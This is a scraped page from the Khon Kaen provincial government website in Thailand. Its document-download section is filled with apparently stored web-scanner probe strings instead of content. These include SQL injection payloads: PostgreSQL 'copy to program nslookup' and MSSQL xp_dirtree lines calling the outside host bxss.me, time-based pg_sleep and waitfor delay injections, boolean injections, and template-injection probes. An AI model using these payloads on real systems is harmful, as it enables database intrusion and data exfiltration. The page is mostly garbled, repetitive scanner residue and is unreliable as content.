- หน้าหลัก
- Link หน่วยงานในจังหวัด
- รายงานอุบัติเหตุทางถนน
- สาระข่าวสาร
- นโยบาย/แผน
- วาระประชุมประจำเดือน
- ประกวดราคา
- กบจ. ขก.
- Download เอกสารสำคัญ
- เรียนรู้ IT
- ลดขั้นตอนการปฏิบัติราชการ
- ประวัติเมืองขอนแก่น
- ลักษณะทั่วไป
- สังคมและการปกครอง
- โครงสร้างและบริการพื้นฐาน
- การเมืองการเลือกตั้ง
- คุณภาพชีวิตของประชาชน
- ทำเนียบส่วนราชการ
- หมายเลขโทรศัพท์ที่ควรรู้
- วิสัยทัศน์/ยุทธศาสตร์
- คำรับรองการปฎิบัติราชการ
- ประเมินผลการปฏิบัติราชการ
- แนวทางการดำเนินงาน
- รายงานผลการเบิกจ่ายงบประมาณ
- สถานที่ท่องเที่ยว
- การเดินทางมาขอนแก่น
- เทศกาลงานประจำปี
- โรงแรม / ที่พัก
- ร้านอาหาร
- ของฝากสินค้าพื้นเมือง
- รับฟังความคิดเห็นของประชาชน
ระบบสารสนเทศภูมิศาสตร์ จังหวัดขอนแก่น
TOR
รัฐบาลไทย
Unseen Thailand
การท่องเที่ยวแห่งประเทศไทย
กระทรวงมหาดไทย
MOI.GO.TH
MOINET
ekaset.net
Download เอกสารสำคัญ จังหวัดขอนแก่น

  {{9999284*10000293}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux8480%C0%BEz1%C0%BCz2a%90bcxuca8480
  acu5554%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5554
  1_976989
  1'"()&%
  {{9999138*9999174}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux7845%C0%BEz1%C0%BCz2a%90bcxuca7845
  acu3541%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3541
  1_987924
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  1
  1'"()&%
  {{9999201*10000270}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux2037%C0%BEz1%C0%BCz2a%90bcxuca2037
  acu10104%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10104
  1_957842
  1'"()&%
  {{9999888*9999880}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux1074%C0%BEz1%C0%BCz2a%90bcxuca1074
  acu9603%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9603
  1_991979
  1'"()&%
  {{9999776*10000027}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux5456%C0%BEz1%C0%BCz2a%90bcxuca5456
  acu4944%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4944
  1_955876
  1'"()&%
  {{9999609*9999444}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux1460%C0%BEz1%C0%BCz2a%90bcxuca1460
  acu9111%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9111
  1_964618
  1'"()&%
  {{9999884*10000046}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux3243%C0%BEz1%C0%BCz2a%90bcxuca3243
  acu5040%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5040
  1_969563
  1'"()&%
  {{10000067*10000187}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux1185%C0%BEz1%C0%BCz2a%90bcxuca1185
  acu2263%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2263
  1_976150
  1'"()&%
  {{9999909*9999297}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux10564%C0%BEz1%C0%BCz2a%90bcxuca10564
  acu6277%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6277
  1_901623
  1'"()&%
  {{9999487*9999395}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux10473%C0%BEz1%C0%BCz2a%90bcxuca10473
  acu5902%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5902
  1_908159
  1'"()&%
  {{10000398*9999252}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux7307%C0%BEz1%C0%BCz2a%90bcxuca7307
  acu9107%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9107
  1_973403
  1'"()&%
  {{9999692*9999725}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux8607%C0%BEz1%C0%BCz2a%90bcxuca8607
  acu4463%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4463
  1_952765
  1'"()&%
  {{9999412*10000289}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux8383%C0%BEz1%C0%BCz2a%90bcxuca8383
  acu1237%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1237
  1_939525
  1'"()&%
  {{9999199*10000344}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux7357%C0%BEz1%C0%BCz2a%90bcxuca7357
  acu3040%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3040
  1_987388
  1'"()&%
  {{10000412*9999645}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux2178%C0%BEz1%C0%BCz2a%90bcxuca2178
  acu1279%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1279
  1_969729
  1'"()&%
  {{9999103*9999901}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux5043%C0%BEz1%C0%BCz2a%90bcxuca5043
  acu4558%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4558
  1_931403
  1'"()&%
  {{10000107*10000201}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux10429%C0%BEz1%C0%BCz2a%90bcxuca10429
  acu2449%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2449
  1_902045
  1'"()&%
  {{10000057*9999710}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux4565%C0%BEz1%C0%BCz2a%90bcxuca4565
  acu5116%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5116
  1_916290
  1'"()&%
  {{9999928*9999170}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux7384%C0%BEz1%C0%BCz2a%90bcxuca7384
  acu4542%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4542
  1_993759
  1'"()&%
  {{9999232*10000034}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux9809%C0%BEz1%C0%BCz2a%90bcxuca9809
  acu4039%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4039
  1_916629
  1'"()&%
  {{10000124*9999435}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux1837%C0%BEz1%C0%BCz2a%90bcxuca1837
  acu7090%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7090
  1_926055
  1'"()&%
  {{9999172*9999453}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux3099%C0%BEz1%C0%BCz2a%90bcxuca3099
  acu7746%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7746
  1_996368
  1'"()&%
  {{9999465*9999109}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux6011%C0%BEz1%C0%BCz2a%90bcxuca6011
  acu2225%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2225
  1_935862
  1'"()&%
  {{9999268*9999336}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux2565%C0%BEz1%C0%BCz2a%90bcxuca2565
  acu2269%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2269
  1_979625
  1'"()&%
  {{9999179*10000059}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux8060%C0%BEz1%C0%BCz2a%90bcxuca8060
  acu3032%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3032
  1_985685
  1'"()&%
  {{9999408*9999065}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux7985%C0%BEz1%C0%BCz2a%90bcxuca7985
  acu6341%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6341
  1_963935
  1'"()&%
  {{9999027*9999052}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux3523%C0%BEz1%C0%BCz2a%90bcxuca3523
  acu7748%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7748
  1_920145
  1'"()&%
  {{9999950*9999727}}
  CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%
  acux7511%C0%BEz1%C0%BCz2a%90bcxuca7511
  acu8538%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8538
  1_912746
  1'"()&%
  1acuiLgaiFMekm
  1
  1
  1
  1acujS4LhQHONr
  1
  1
  1
  1
  1
  1
  1';copy (select '') to program 'nslookup dns.sqli.\006450.71-51977.71.58e5c.\1.bxss.me
  1;copy (select '') to program 'nslookup dns.sqli.\006450.71-51975.71.58e5c.\1.bxss.me'
  1');EXEC master..xp_dirtree '\\dns.sqli.006450.71-51972.71.58e5c.1.bxss.me\' --
  1';EXEC master..xp_dirtree '\\dns.sqli.006450.71-51969.71.58e5c.1.bxss.me\' --
  1;EXEC master..xp_dirtree '\\dns.sqli.006450.71-51964.71.58e5c.1.bxss.me\' --
  '||UTL_INADDR.get_host_address('dns.'||'sqli.006450.71-51961.71.58e5c.1.bxss'||'.me')||'
  1||UTL_INADDR.get_host_address('dns.'||'sqli.006450.71-51959.71.58e5c.1.bxss'||'.me')
  ymQO95jf'));select pg_sleep(9); --
  Ak5Ki5kj');select pg_sleep(6); --
  Ke32femi';select pg_sleep(6); --
  -1));select pg_sleep(6); --
  -1);select pg_sleep(3); --
  -1;select pg_sleep(3); --
  iDA1fnAR')); waitfor delay '0:0:3' --
  Rc26PdTj'); waitfor delay '0:0:9' --
  Ndj5Dxry'; waitfor delay '0:0:9' --
  1 waitfor delay '0:0:9' --
  -1)); waitfor delay '0:0:6' --
  -1); waitfor delay '0:0:6' --
  -1; waitfor delay '0:0:6' --
  (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sl
  if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep
  -1" OR 2+670-670-1=0+0+0+1 --
  (select convert(int,CHAR(65)))
  -1' OR 2+426-426-1=0+0+0+1 or 'H68ZkElQ'='
  ๐''๐""
  -1' OR 2+905-905-1=0+0+0+1 --
  1_905288
  ฟ'ฟ"
  -1 OR 2+134-134-1=0+0+0+1
  '"()&%
  JyI=
  -1 OR 2+741-741-1=0+0+0+1 --
  1'"()&%
  @@ycns6
  S9jAqkTi
  1ภงภข
  1
  \
  1
  1
  1'"
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  1
  
ตั้งแต่ 27 กันยายน 2548
khonkaen@moi.go.th
© 2003-2005 khonkaen.go.th
กลุ่มงานข้อมูลสารสนเทศและการสื่อสาร สำนักงานจังหวัดขอนแก่น
ชั้น3 ศาลากลางจังหวัดขอนแก่น อ.เมือง จ.ขอนแก่น
Tel. 0-4333-1515 ,( สป.มท. ) 40422
Fax. 0-4333-1515